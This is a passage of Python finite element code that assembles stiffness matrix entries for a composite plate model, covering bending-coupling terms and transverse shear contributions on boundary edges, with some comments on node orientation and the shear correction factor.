k0[i4*dof+3, i1*dof+1] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+3, i1*dof+3] += Ac*((D11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+3, i1*dof+4] += Ac*((D12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+3, i2*dof+0] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+3, i2*dof+1] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+3, i2*dof+3] += Ac*((D11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+3, i2*dof+4] += Ac*((D12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+3, i3*dof+0] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+3, i3*dof+1] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+3, i3*dof+3] += Ac*((D11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+3, i3*dof+4] += Ac*((D12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+3, i4*dof+0] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+3, i4*dof+1] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+3, i4*dof+3] += Ac*((D11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+3, i4*dof+4] += Ac*((D12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+4, i1*dof+0] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+4, i1*dof+1] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+4, i1*dof+3] += Ac*((D12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+4, i1*dof+4] += Ac*((D22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+4, i2*dof+0] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+4, i2*dof+1] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+4, i2*dof+3] += Ac*((D12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+4, i2*dof+4] += Ac*((D22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+4, i3*dof+0] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+4, i3*dof+1] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+4, i3*dof+3] += Ac*((D12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+4, i3*dof+4] += Ac*((D22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+4, i4*dof+0] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+4, i4*dof+1] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+4, i4*dof+3] += Ac*((D12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+4, i4*dof+4] += Ac*((D22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
# Edge shared by exactly one triangle (a boundary edge): the transverse
# shear contribution is built from that single adjacent triangle.
if len(edge.trias) == 1:
    tria = edge.trias[0]
    # Find the triangle node opposite to this edge (the one not on the edge).
    if not tria.n1 in edge.nodes:
        other1 = tria.n1
    elif not tria.n2 in edge.nodes:
        other1 = tria.n2
    elif not tria.n3 in edge.nodes:
        other1 = tria.n3
    else:
        raise RuntimeError('Invalid connectivity tria-edge')
    # Orient the edge nodes so that (tn1 -> tn2 -> other1) has positive
    # orientation with respect to ZGLOBAL (cross product test).
    if np.dot(np.cross((n2 - n1).pos, (other1 - n1).pos), ZGLOBAL) > 0:
        tn1, tn2 = n1, n2
    else:
        tn1, tn2 = n2, n1
    x1, y1, z1 = tn1.pos
    x2, y2, z2 = tn2.pos
    x3, y3, z3 = other1.pos
    # In-plane geometry: (a, b) is the edge vector, (c, d) points to the
    # opposite node; the z components are not used below.
    a = x2 - x1
    b = y2 - y1
    c = x3 - x1
    d = y3 - y1
    Ae = tria.Ae
    #TODO interpolate nodal properties when used
    if prop_from_node:
        raise NotImplementedError('')
    # Shear correction factor.
    # NOTE(review): 5/6 relies on true division (Python 3 or
    # `from __future__ import division`); under classic Python 2 integer
    # division this would evaluate to 0 -- confirm at the file top.
    k = 5/6 #TODO!!!
    # Corrected transverse shear stiffness terms of the 2x2 matrix E.
    E = k * tria.prop.E
    E44 = E[0, 0]
    E45 = E[0, 1]
    E55 = E[1, 1]
    # Global DOF base indices for the two edge nodes and the opposite node.
    i1 = tn1.index
    i2 = tn2.index
    i3 = other1.index
k0[i1*dof+2, i1*dof+2] += (-(a - c)*(E45*(b - d) - E55*(a - c)) + (b - d)*(E44*(b - d) - E45*(a - c)))/(4*(Ae*Ae))
k0[i1*dof+2, i1*dof+3] += (E44*(b - d) - E45*(a - c))/(4*Ae)
k0[i1*dof+2, i1*dof+4] += (E45*(b - d) - E55*(a - c))/(4*Ae)
k0[i1*dof+2, i2*dof+2] += (-c*(E45*(b - d) - E55*(a - c)) + d*(E44*(b - d) - E45*(a - c)))/(4*(Ae*Ae))
k0[i1*dof+2, i2*dof+3] += a*(-c*(E45*(b - d) - E55*(a - c)) + d*(E44*(b - d) - E45*(a - c)))/(8*(Ae*Ae))
k0[i1*dof+2, i2*dof+4] += b*(-c*(E45*(b - d) - E55*(a - c)) + d*(E44*(b - d) - E45*(a - c)))/(8*(Ae*Ae))
k0[i1*dof+2, i3*dof+2] += (a*(E45*(b - d) - E55*(a - c)) - b*(E44*(b - d) - E45*(a - c)))/(4*(Ae*Ae))
k0[i1*dof+2, i3*dof+3] += c*(a*(E45*(b - d) - E55*(a - c)) - b*(E44*(b - d) - E45*(a - c)))/(8*(Ae*Ae))
k0[i1*dof+2, i3*dof+4] += d*(a*(E45*(b - d) - E55*(a - c)) - b*(E44*(b - d) - E45*(a - c)))/(8*(Ae*Ae))
k0[i1*dof+3, i1*dof+2] += (E44*(b - d) - E45*(a - c))/(4*Ae)
k0[i1*dof+3, i1*dof+3] += E44/4
k0[i1*dof+3, i1*dof+4] += E45/4
k0[i1*dof+3, i2*dof+2] += (E44*d - E45*c)/(4*Ae)
k0[i1*dof+3, i2*dof+3] += a*(E44*d - E45*c)/(8*Ae)
k0[i1*dof+3, i2*dof+4] += b*(E44*d - E45*c)/(8*Ae)
k0[i1*dof+3, i3*dof+2] += (-E44*b + E45*a)/(4*Ae)
k0[i1*dof+3, i3*dof+3] += c*(-E44*b + E45*a)/(8*Ae)
k0[i1*dof+3, i3*dof+4] += d*(-E44*b + E45*a)/(8*Ae)
k0[i1*dof+4, i1*dof+2] += (E45*(b - d) - E55*(a - c))/(4*Ae)
k0[i1*dof+4, i1*dof+3] += E45/4
k0[i1*dof+4, i1*dof+4] += E55/4
k0[i1*dof+4, i2*dof+2] += (E45*d - E55*c)/(4*Ae)
k0[i1*dof+4, i2*dof+3] += a*(E45*d - E55*c)/(8*Ae)
k0[i1*dof+4, i2*dof+4] += b*(E45*d - E55*c)/(8*Ae)
k0[i1*dof+4, i3*dof+2] += (-E45*b + E55*a)/(4*Ae)
k0[i1*dof+4, i3*dof+3] += c*(-E45*b + E55*a)/(8*Ae)
k0[i1*dof+4, i3*dof+4] += d*(-E45*b + E55*a)/(8*Ae)
k0[i2*dof+2, i1*dof+2] += (-(a - c)*(E45*d - E55*c) + (b - d)*(E44*d - E45*c))/(4*(Ae*Ae))
k0[i2*dof+2, i1*dof+3] += (E44*d - E45*c)/(4*Ae)
k0[i2*dof+2, i1*dof+4] += (E45*d - E55*c)/(4*Ae)
k0[i2*dof+2, i2*dof+2] += (-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(4*(Ae*Ae))
k0[i2*dof+2, i2*dof+3] += a*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+2, i2*dof+4] += b*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+2, i3*dof+2] += (a*(E45*d - E55*c) - b*(E44*d - E45*c))/(4*(Ae*Ae))
k0[i2*dof+2, i3*dof+3] += c*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+2, i3*dof+4] += d*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+3, i1*dof+2] += a*(-(a - c)*(E45*d - E55*c) + (b - d)*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+3, i1*dof+3] += a*(E44*d - E45*c)/(8*Ae)
k0[i2*dof+3, i1*dof+4] += a*(E45*d - E55*c)/(8*Ae)
k0[i2*dof+3, i2*dof+2] += a*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+3, i2*dof+3] += (a*a)*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+3, i2*dof+4] += a*b*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+3, i3*dof+2] += a*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+3, i3*dof+3] += a*c*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+3, i3*dof+4] += a*d*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+4, i1*dof+2] += b*(-(a - c)*(E45*d - E55*c) + (b - d)*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+4, i1*dof+3] += b*(E44*d - E45*c)/(8*Ae)
k0[i2*dof+4, i1*dof+4] += b*(E45*d - E55*c)/(8*Ae)
k0[i2*dof+4, i2*dof+2] += b*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+4, i2*dof+3] += a*b*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+4, i2*dof+4] += (b*b)*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+4, i3*dof+2] += b*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+4, i3*dof+3] += b*c*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+4, i3*dof+4] += b*d*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i3*dof+2, i1*dof+2] += ((a - c)*(E45*b - E55*a) - (b - d)*(E44*b - E45*a))/(4*(Ae*Ae))
k0[i3*dof+2, i1*dof+3] += (-E44*b + E45*a)/(4*Ae)
k0[i3*dof+2, i1*dof+4] += (-E45*b + E55*a)/(4*Ae)
k0[i3*dof+2, i2*dof+2] += (c*(E45*b - E55*a) - d*(E44*b - E45*a))/(4*(Ae*Ae))
k0[i3*dof+2, i2*dof+3] += a*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+2, i2*dof+4] += b*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+2, i3*dof+2] += (-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(4*(Ae*Ae))
k0[i3*dof+2, i3*dof+3] += c*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+2, i3*dof+4] += d*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+3, i1*dof+2] += c*((a - c)*(E45*b - E55*a) - (b - d)*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+3, i1*dof+3] += c*(-E44*b + E45*a)/(8*Ae)
k0[i3*dof+3, i1*dof+4] += c*(-E45*b + E55*a)/(8*Ae)
k0[i3*dof+3, i2*dof+2] += c*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+3, i2*dof+3] += a*c*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(16*(Ae*Ae))
